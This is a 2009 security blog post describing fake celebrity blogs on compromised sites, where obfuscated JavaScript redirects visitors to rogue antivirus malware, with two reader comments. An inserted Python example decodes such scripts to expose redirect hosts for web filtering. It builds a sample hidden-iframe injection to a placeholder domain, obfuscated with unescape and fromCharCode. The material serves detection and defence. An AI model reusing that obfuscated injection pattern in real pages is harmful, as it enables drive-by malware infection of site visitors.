Wednesday, September 9, 2009

Fake Blogs Serve Rogue Malware

eSoft’s Threat Prevention Team has uncovered a large number of recently compromised websites, all redirecting to rogue AV malware.

At the time of writing, Google shows over 720,000 compromised URLs. According to VirusTotal, only two of forty-one anti-virus engines currently detect the malware.

Credit also goes to Edgar, who independently discovered and blogged about this same threat.

The compromised sites frequently contain fake blogs on the topics of entertainment and celebrities such as Britney Spears (see screenshot).


Upon visiting the site, an obfuscated JavaScript file redirects the visitor to one of several sites that host the malware payload. Multiple redirect domains are used to further obscure the final destination; all of these are currently flagged as malicious by eSoft (most have been flagged for over a week).
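As an added example (not code from the eSoft post or from Edgar's blog): a small Python triage script that peels the unescape()/String.fromCharCode() layers typical of injected redirect scripts of this era, pulls out the iframe or location targets, and checks their hosts against a blocklist the way a gateway web filter would. The sample page, its injected script, the blocklist and the redir-one.invalid domain are all constructed for this example; the post does not publish the actual script or the redirect domains.

```python
"""Static triage of an obfuscated redirect script injected into a web page.

Added example, not from the eSoft write-up. The sample below is constructed
to mimic the injected-script pattern described in the post (a hidden iframe
wrapped in unescape()/String.fromCharCode() layers); the domain in it is a
placeholder, not a real indicator.
"""
import re
from urllib.parse import unquote, urlparse


# --- building the constructed sample ------------------------------------

def obfuscate(html):
    """Wrap an HTML snippet the way low-effort injectors commonly did:
    percent-escape it for unescape(), then hide that whole call behind
    String.fromCharCode() so neither the URL nor 'unescape' is greppable."""
    inner = "document.write(unescape('%s'))" % "".join(
        "%%%02X" % b for b in html.encode())
    codes = ",".join(str(ord(c)) for c in inner)
    return "<script>eval(String.fromCharCode(%s));</script>" % codes


# Constructed sample page: a fake celebrity blog with the injected script.
SAMPLE_HTML = (
    "<html><body><h1>Britney Spears latest news</h1><p>...</p>"
    + obfuscate('<iframe src="http://redir-one.invalid/in.cgi?3" '
                'width="1" height="1" style="visibility:hidden"></iframe>')
    + "</body></html>"
)


# --- peeling the layers ----------------------------------------------------

UNESCAPE_RE = re.compile(r"unescape\(\s*(['\"])(.*?)\1\s*\)", re.S)
FROMCHARCODE_RE = re.compile(r"String\.fromCharCode\(\s*([\d\s,]*)\)")
# iframe/script src, href, or a window.location assignment pointing at http(s).
TARGET_RE = re.compile(
    r"""(?:src|href|location(?:\.href)?)\s*=\s*['"]?\s*(https?://[^'"\s>]+)""",
    re.I)


def js_unescape(s):
    """JavaScript unescape(): %XX bytes plus the %uXXXX form unquote() lacks."""
    s = re.sub(r"%u([0-9a-fA-F]{4})", lambda m: chr(int(m.group(1), 16)), s)
    return unquote(s)


def peel(text, max_rounds=10):
    """Replace each recognised decoder call with its decoded string, in place,
    until nothing changes. Substituting plaintext (rather than a re-quoted
    literal) is enough for indicator extraction; it is not meant to be
    executable JavaScript afterwards. max_rounds bounds pathological input."""
    for _ in range(max_rounds):
        new = FROMCHARCODE_RE.sub(
            lambda m: "".join(chr(int(n)) for n in m.group(1).split(",")
                              if n.strip()),
            text)
        new = UNESCAPE_RE.sub(lambda m: js_unescape(m.group(2)), new)
        if new == text:
            break
        text = new
    return text


def extract_targets(html):
    """Return redirect/iframe URLs visible only after peeling the layers."""
    seen, out = set(), []
    for url in TARGET_RE.findall(peel(html)):
        if url not in seen:
            seen.add(url)
            out.append(url)
    return out


def flagged_domains(html, blocklist):
    """Map each target host to whether a web-filter blocklist (constructed by
    the caller) would have stopped the redirect before the payload loaded."""
    return {urlparse(u).hostname: urlparse(u).hostname in blocklist
            for u in extract_targets(html)}


if __name__ == "__main__":
    # A plain grep for http:// on the raw page finds nothing; decoding does.
    print("raw grep finds:", TARGET_RE.findall(SAMPLE_HTML))
    print("after decoding:", extract_targets(SAMPLE_HTML))
    print(flagged_domains(SAMPLE_HTML, {"redir-one.invalid"}))
```

The point of the raw-grep line is the one the post makes about layered defences: signatures on the payload lag, and the injected loader hides the distribution domain from naive string matching, so blocking the redirect hosts at the gateway after decoding them is what actually stops the chain.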

Unprotected users will see a pop-up window that performs a fake system scan. The user is then notified that they are infected with several threats and prompted to download the supposed cure, which is in fact the malware. This scheme is all too common, and eSoft’s Threat Prevention Team has been detecting a dramatic increase in this scam through August. This latest campaign appears to be the most widespread to date.

The malware payloads change often and anti-virus detection is lagging behind.  eSoft recommends multiple layers of anti-virus at the desktop and gateway in combination with secure web filtering. A secure web filter protects users by blocking the malware distribution points even as the malware changes to evade anti-virus detection.


Edgar Bangkok said...

Many thanks for mentioning my blog in the post

Edgar from Bangkok

Mike said...

I actually got had by one of these recently. I saw the pop-up and clicked it to close it, but that very click was what infected me. People need to realize that clicking anywhere on these is like inviting the malware onto your system. If you find yourself on one of these sites and the pop-up is there, just go to your task manager (Ctrl-Shift-Esc) and shut Firefox down - that's your best bet.